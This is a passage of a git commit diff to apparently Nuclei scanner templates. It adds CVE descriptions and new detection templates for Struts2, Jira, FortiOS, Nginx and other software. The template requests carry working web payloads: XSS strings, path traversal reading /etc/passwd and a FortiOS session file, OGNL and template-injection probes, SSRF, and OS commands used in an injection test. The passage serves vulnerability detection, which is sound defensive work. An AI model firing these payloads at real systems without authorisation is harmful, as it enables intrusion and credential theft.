commit
747aa48d09
|
@ -4,6 +4,7 @@ info:
|
|||
name: Oracle Content Server XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
|
||||
author: Random-Robbie
|
||||
severity: high
|
||||
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -3,6 +3,7 @@ info:
|
|||
author: "Random Robbie"
|
||||
name: "Struts2 RCE "
|
||||
severity: critical
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
|
|
|
@ -3,6 +3,7 @@ info:
|
|||
author: "Harsh Bothra"
|
||||
name: "Nginx Remote Integer Overflow"
|
||||
severity: medium
|
||||
description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
|
||||
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Jira IconURIServlet SSRF
|
||||
author: Ice3man
|
||||
severity: high
|
||||
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: CVE-2017-9841
|
||||
author: Random-Robbie
|
||||
severity: High
|
||||
|
||||
description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
|
||||
# Reference to exploit
|
||||
# https://github.com/cyberharsh/Php-unit-CVE-2017-9841
|
||||
# https://github.com/RandomRobbieBF/phpunit-brute
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Jolokia XSS
|
||||
author: mavericknerd
|
||||
severity: high
|
||||
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Nuxeo Authentication Bypass Remote Code Execution
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
description: Nuxeo Authentication Bypass Remote Code Execution < 103 using a SSTI
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Wordpress unauthenticated stored xss
|
||||
author: nadino
|
||||
severity: medium
|
||||
description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
|
||||
author: madrobot & dwisiswant0
|
||||
severity: high
|
||||
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Atlassian Jira WallboardServlet XSS
|
||||
author: madrobot & dwisiswant0
|
||||
severity: medium
|
||||
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Oracle WebCenter Sites XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Nexus Repository Manager 3 RCE
|
||||
auhtor: hetroublemakr
|
||||
severity: high
|
||||
description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).
|
||||
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
|
||||
|
||||
requests:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Sonatype Nexus Repository RCE
|
||||
auhtor: hetroublemakr
|
||||
severity: high
|
||||
description: A Remote Code Execution vulnerability has been discovered in Nexus Repository Manager requiring immediate action. The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM
|
||||
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
|
||||
|
||||
requests:
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: CVE-2020-12720 vBulletin SQLI
|
||||
author: pdnuclei - projectdiscovery.io
|
||||
severity: critical
|
||||
|
||||
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
|
||||
# Source https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Netsweeper WebAdmin unixlogin.php Python Code Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
|
||||
|
||||
# This template exploits a Python code injection in the Netsweeper
|
||||
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Unauthenticated Grafana DoS
|
||||
author: pxmme1337
|
||||
severity: medium
|
||||
description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client.
|
||||
|
||||
# Source:- https://www.exploit-db.com/exploits/48638
|
||||
# WARNING
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Artica Web Proxy 4.30 OS Command Injection
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
|
||||
|
||||
# Artica Web Proxy 4.30.00000000
|
||||
# allows an authenticated remote attacker
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Artica Web Proxy 4.30 Authentication Bypass
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
|
||||
|
||||
# Artica Web Proxy 4.30.00000000
|
||||
# allows remote attacker to bypass privilege detection
|
||||
|
|
|
@ -15,9 +15,9 @@ info:
|
|||
requests:
|
||||
- payloads:
|
||||
command:
|
||||
- "systeminfo" # Windows
|
||||
- "lsb_release -a" # Linux
|
||||
- "sysctl kern.ostype" # macOS
|
||||
- "systeminfo" # Windows
|
||||
- "lsb_release -a" # Linux
|
||||
- "sysctl kern.ostype" # macOS
|
||||
port:
|
||||
- "80"
|
||||
- "443"
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: IceWarp WebMail XSS
|
||||
author: pdnuclei & dwisiswant0
|
||||
severity: medium
|
||||
description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
|
||||
|
||||
# source:- https://www.exploit-db.com/exploits/47988
|
||||
# https://twitter.com/sagaryadav8742/status/1275170967527006208
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Apache Tomcat RCE by deserialization
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,6 +4,8 @@ info:
|
|||
name: Apache OFBiz XML-RPC Java Deserialization
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
|
||||
|
||||
|
||||
# This temaplte detects a Java deserialization vulnerability in Apache
|
||||
# OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: SEOmatic < 3.3.0 Server-Side Template Injection
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,16 +5,15 @@ info:
|
|||
severity: high
|
||||
|
||||
requests:
|
||||
|
||||
# https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
|
||||
# https://github.com/grafana/grafana/issues/14755
|
||||
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
|
||||
# So make sure, not to attempt more than 4 password for same valid user.
|
||||
# https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
|
||||
# https://github.com/grafana/grafana/issues/14755
|
||||
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
|
||||
# So make sure, not to attempt more than 4 password for same valid user.
|
||||
|
||||
- payloads:
|
||||
|
||||
# grafana_username:
|
||||
# - admin
|
||||
# grafana_username:
|
||||
# - admin
|
||||
|
||||
grafana_password:
|
||||
- prom-operator
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Security.txt File
|
||||
author: bad5ect0r
|
||||
severity: info
|
||||
description: The website defines a security policy.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2017-10075
|
||||
|
||||
info:
|
||||
name: Oracle Content Server XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO"
|
||||
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(31337)</script>"
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2017-14849
|
||||
|
||||
info:
|
||||
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
|
||||
author: Random-Robbie
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/static/../../../a/../../../../etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2017-5638
|
||||
info:
|
||||
author: "Random Robbie"
|
||||
name: "Struts2 RCE "
|
||||
severity: critical
|
||||
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
# Exploit:- https://github.com/mazen160/struts-pwn
|
||||
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
|
||||
Accept-Language: en
|
||||
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
|
||||
Connection: Keep-Alive
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
|
||||
Pragma: no-cache
|
||||
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Bounty Plz"
|
||||
part: header
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2017-7529
|
||||
info:
|
||||
author: "Harsh Bothra"
|
||||
name: "Nginx Remote Integer Overflow"
|
||||
severity: medium
|
||||
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Range: bytes=-17208,-9223372036854758792
|
||||
Connection: close
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 206
|
||||
- type: word
|
||||
words:
|
||||
- Content-Range
|
||||
part: all
|
|
@ -0,0 +1,16 @@
|
|||
id: CVE-2017-9506
|
||||
|
||||
info:
|
||||
name: Jira IconURIServlet SSRF
|
||||
author: Ice3man
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "ipinfo.io/missingauth"
|
||||
part: body
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2017-9841
|
||||
|
||||
info:
|
||||
name: CVE-2017-9841
|
||||
author: Random-Robbie
|
||||
severity: High
|
||||
|
||||
# Reference to exploit
|
||||
# https://github.com/cyberharsh/Php-unit-CVE-2017-9841
|
||||
# https://github.com/RandomRobbieBF/phpunit-brute
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/laravel_api/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/api/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/apps/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/backup/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/oldsite/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/lib/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/modules/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/old/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/zend/vendor/phpunit/phpunit/phpunit"
|
||||
- "{{BaseURL}}/yii/vendor/phpunit/phpunit/phpunit"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "this version of phpunit requires php 5"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,23 @@
|
|||
id: CVE-2018-0296
|
||||
|
||||
info:
|
||||
name: Cisco ASA path traversal vulnerability
|
||||
author: organiccrap
|
||||
severity: medium
|
||||
# https://github.com/yassineaboukir/CVE-2018-0296
|
||||
# curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
|
||||
# if vulnerable, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "///sessions"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2018-1000129
|
||||
|
||||
info:
|
||||
name: Jolokia XSS
|
||||
author: mavericknerd
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
|
||||
- "{{BaseURL}}/api/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
|
||||
- "{{BaseURL}}:8080/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1337)>"
|
||||
part: body
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2018-11409
|
||||
|
||||
info:
|
||||
name: Splunk Sensitive Information Disclosure
|
||||
author: Harsh Bothra
|
||||
severity: medium
|
||||
|
||||
# source:- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'
|
||||
- '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- licenseKeys
|
|
@ -0,0 +1,23 @@
|
|||
id: CVE-2018-11759
|
||||
|
||||
info:
|
||||
name: Apache Tomcat JK Status Manager Access
|
||||
author: Harsh Bothra
|
||||
severity: medium
|
||||
|
||||
# Source:- https://github.com/immunIT/CVE-2018-11759
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/jkstatus'
|
||||
- '{{BaseURL}}/jkstatus;'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "JK Status Manager"
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2018-1247
|
||||
|
||||
info:
|
||||
name: RSA Authentication Manager XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "application/x-shockwave-flash"
|
||||
part: header
|
||||
- type: word
|
||||
words:
|
||||
- "javascript:alert(1337)"
|
||||
part: body
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2018-1271
|
||||
|
||||
info:
|
||||
name: Spring MVC Directory Traversal Vulnerability
|
||||
author: hetroublemakr
|
||||
severity: High
|
||||
# reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
|
||||
- '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'for 16-bit app support'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,15 @@
|
|||
id: CVE-2018-13379
|
||||
|
||||
info:
|
||||
name: FortiOS - Credentials Disclosure
|
||||
author: organiccrap
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "var fgt_lang ="
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2018-14728
|
||||
|
||||
info:
|
||||
name: Responsive filemanager 9.13.1 - SSRF/LFI
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/filemanager/upload.php"
|
||||
|
||||
body: "fldr=&url=file:///etc/passwd"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,16 @@
|
|||
id: CVE-2018-16341
|
||||
|
||||
info:
|
||||
name: Nuxeo Authentication Bypass Remote Code Execution
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "31333333337"
|
||||
part: body
|
|
@ -0,0 +1,17 @@
|
|||
id: CVE-2018-18069
|
||||
|
||||
info:
|
||||
name: Wordpress unauthenticated stored xss
|
||||
author: nadino
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin.php"
|
||||
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'
|
|
@ -0,0 +1,16 @@
|
|||
id: CVE-2018-19439
|
||||
|
||||
info:
|
||||
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
|
||||
author: madrobot & dwisiswant0
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(1337)</script><!--</TITLE>"
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2018-20824
|
||||
|
||||
info:
|
||||
name: Atlassian Jira WallboardServlet XSS
|
||||
author: madrobot & dwisiswant0
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- (?mi)timeout:\salert\(document\.domain\)
|
||||
part: body
|
|
@ -0,0 +1,16 @@
|
|||
id: CVE-2018-2791
|
||||
|
||||
info:
|
||||
name: Oracle WebCenter Sites XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(1337)</script>"
|
||||
part: body
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2018-3714
|
||||
info:
|
||||
name: node-srv Path Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/node_modules/../../../../../etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2018-3760
|
||||
|
||||
info:
|
||||
name: Rails cve-2018-3760
|
||||
author: 0xrudra
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2018-5230
|
||||
|
||||
info:
|
||||
name: Atlassian Confluence Status-List XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "SRC=\"javascript:alert(1337)\">"
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2018-7490
|
||||
|
||||
info:
|
||||
name: uWSGI PHP Plugin Directory Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-10475
|
||||
|
||||
info:
|
||||
name: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
